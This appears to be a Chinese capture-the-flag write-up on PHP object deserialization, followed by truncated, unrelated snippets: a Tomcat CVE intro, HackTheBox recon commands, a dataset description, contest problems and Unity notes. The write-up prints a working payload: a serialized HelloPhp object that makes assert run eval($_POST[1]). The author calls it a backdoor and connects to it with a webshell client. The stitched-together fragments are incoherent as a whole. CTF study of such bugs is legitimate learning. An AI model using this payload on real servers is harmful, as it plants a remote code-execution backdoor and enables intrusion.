打开源代码发现了个./time.php?source
于是打开点进去
<?php
#error_reporting(0);
class HelloPhp
{
public $a;
public $b;
public function __construct(){
$this->a = "Y-m-d h:i:s";
$this->b = "date";
}
public function __destruct(){
$a = $this->a;
$b = $this->b;
echo $b($a);
}
}
$c = new HelloPhp;
if(isset($_GET['source']))
{
highlight_file(__FILE__);
die(0);
}
@$ppp = unserialize($_GET["data"]);
审计代码:
发现在__destruct()方法里面有 echo $b($a);
这个是php的特性,php可以通过这种方法动态调用方法。
思路很简单,只要把$b赋值为方法名字,吧$a赋值成调用的参数就行了。
我首先考虑的是system结果发现system好像被过滤了,于是自己搭了环境
<?php
highlight_file(__FILE__);
class HelloPhp
{
public $a = 'eval($_POST[1])';
public $b = "assert";
public function __destruct(){
$a = $this->a;
$b = $this->b;
echo $b($a);
}
}
// system('dir');
// $b = new HelloPhp;
$c = urlencode(serialize(new HelloPhp));
echo($c);
//O%3A8%3A%22HelloPhp%22%3A2%3A%7Bs%3A1%3A%22a%22%3Bs%3A15%3A%22eval%28%24_POST%5B1%5D%29%22%3Bs%3A1%3A%22b%22%3Bs%3A6%3A%22assert%22%3B%7D
?>
上述代码可以为自己创建一个后门。
payload:

发现成功了,于是可以用蚁剑连接,但是这个题目用蚁剑连接以后是空白一片,于是考虑可能是在phpinfo()里面

目录1.漏洞简介2、AJP13协议介绍Tomcat主要有两大功能:3.Tomcat远程文件包含漏洞分析4.漏洞复现 5、漏洞分析6.RCE实现的原理1.漏洞简介2020年2月20日,公开CNVD的漏洞公告中发现ApacheTomcat文件包含漏洞(CVE-2020-1938)。ApacheTomcat是Apache开源组织开发的用于处理HTTP服务的项目。ApacheTomcat服务器中被发现存在文件包含漏洞,攻击者可利用该漏洞读取或包含Tomcat上所有webapp目录下的任意文件。该漏洞是一个单独的文件包含漏洞,依赖于Tomcat的AJP(定向包协议)。AJP自身存在一定缺陷,导致存在可控
靶机地址:https://app.hackthebox.com/machines/Stocker枚举使用nmap枚举靶机nmap-sC-sV10.10.11.196机子开放了22,80端口,我们本地解析一下这个域名echo"10.10.11.196stocker.htb">>/etc/hosts去浏览器访问这个网站发现只是一个单一的网页,并没有其他的功能,插件也很少现在扫一下目录和子域名,但是目录并没有扫到什么有用的东西但是扫描到一个子域名./gobustervhost-w/usr/share/seclists/Discovery/DNS/bitquark-subdomains-top1000
2011-2020年6月和讯网企业社会责任数据1、时间:2011-2020年6月2、来源:整理自和讯网3、范围:全国4、指标包括:股票代码、股票简称、日期、总得分、评级、 股东责任、盈利得分、净资产收益率、 净资产收益率得分、总资产收益率、 总资产收益率得分;主营业务利润率、 主营业务利润率得分、每股收益、每股收益得分、每股未分配利润、每股未分配利润得分、成本费用利润率、 成本费用利润率得分、偿债能力得分;速动比率、速动比率得分、流动比率、 流动比率得分、现金比率、 现金比率得分、股东权益比率、 股东权益比率得分;资产负债率、 资产负债率得分、股东回报得分、分红融资比、 分红融资比得分、股息率
目录题目题目链接输入描述输出描述测试样例输入样例输出样例提交结果截图详细分析 法1(画图): 法2(代码):带详细注释的源代码题目 上图给出了一个数字三角形。从三角形的顶部到底部有很多条不同的路径。对于每条路径,把路径上面的数加起来可以得到一个和,你的任务就是找到最大的和。路径上的每一步只能从一个数走到下一层和它最近的左边的那个数或者右边的那个数。此外,向左下走的次数与向右下走的次数相差不能超过1。题目链接数字三角形-蓝桥云课(lanqiao.cn)https://www.lanqiao.cn/problems/505/learning/输入描述输入的第一行包含一个整数 N\(
最近老师扔了个老SDK让我编译成安卓APK,自己的电脑已经是一锅大杂烩了,unity2017,unity2020,AndroidStudio3.4.3新老版本全给安上了,最后也是没给编译出来,还是用了老师给的电脑(绿色无污染),使用的是Unity2020版本,没有Java环境,下面记录一下编译流程。目录一、UnityHub二、Unity1、检查安卓环境2、BuildingSetting3、Playersetting--创建签名三、老项目使用新版本库编译问题1、TheminSdkversioncannotbespecifiedintheAndroidManifest.xmlfile.Youhav
场景烘焙流程建议吃饱饭多喝水睡好觉将需要烘焙的场景和不需要烘焙的场景不放到一个父物体下面模型尽量是分开的,烘焙很耗费时间,很吃显卡和CPU性能过程将需要烘焙的场景设置为static选择灯光,将灯光设置为bake打开Lighting窗口(windows》rendering》lighting)烘焙,建议取消自动烘焙。参数不需要按照我图中的参数,我的参数是我随便调整的。等待烘焙完成即可场景烘焙遇到的问题烘焙完成之后场景的模型全部变黑了点击模型,找到模型的fbx文件,然后选择自动生成UVs自动生成碰撞体(根据需求勾选)最后一个是自动展开UVs,然后店家Apply进行应用。然后再回到上面的步骤重新进行烘
目录概括云计算发展市场云技术云安全云原生技术中间件ServerlessSaaS分布式云分类中心云区域云边缘云从中心到边缘边缘云边缘终端云边协同云原生安全架构重塑引起的端到端安全挑战容器镜像链路追踪问题微服务端口暴露数量多问题安全与云融合安全管理新兴安全技术参考来源:中国信息通信研究院概括白皮书首先介绍了云计算产业发展概况,然后重点围绕云原生、SaaS、分布式云、云原生安全、数字化转型、新基建等云计算领域热点话题进行探讨,最后对云计算未来发展进行了展望。云计算发展市场过去十年是云计算突飞猛进的十年,云计算仍将迎来下一个黄金十年,进入普惠发展期。白皮书显示,全球云计算市场保持稳定增长态势。2019
我在C++/CLI中创建一个新的抽象类时遇到了一个奇怪的错误。有很多与此类似的问题,但没有一个答案对我有帮助。在这个新类(class)中,我收到以下错误:errorLNK2020:unresolvedtoken(06000002)Foo::execute这是h文件:#pragmaonceusingnamespaceSystem::IO::Ports;usingnamespaceSystem;publicrefclassFoo{protected:SerialPort^port;public:Foo(SerialPort^sp);virtualarray^execute();};这是cp
2020年第十一届C/C++B组第二场蓝桥杯省赛真题真题第一题:门牌制作第二题:既约分数第三题:蛇形填数第四题:跑步锻炼第五题:七段码第六题:成绩统计第七题:回文日期第八题:子串分值和第九题:平面切分第十题:字串排序题解第一题:门牌制作第二题:既约分数第三题:蛇形填数第四题:跑步锻炼第五题:七段码第六题:成绩统计第七题:回文日期第八题:子串分值和第九题:平面切分第十题:字串排序真题第一题:门牌制作题目描述小蓝要为一条街的住户制作门牌号。这条街一共有2020位住户,门牌号从1到2020编号。小蓝制作门牌的方法是先制作0到9这几个数字字符,最后根据需要将字符粘贴到门牌上,例如门牌1017需要依次粘
目录[ACTF新生赛2020]NTFS数据流john-in-the-middle[ACTF新生赛2020]swp喵喵喵[ACTF新生赛2020]NTFS数据流下载文件得到500个txt文件,提示了NTFS流隐写,所以使用NtfsStreamsEditor2查看得到flag flag{AAAds_nntfs_ffunn?} john-in-the-middle下载文件使用wireshark打开,可以看到许多请求服务器加载资源的HTTP,进行HTTP包导出查看logo.png似乎是缺了一行,查看 scanlines.png没有有用信息,使用Stegsolve的ImageCombiner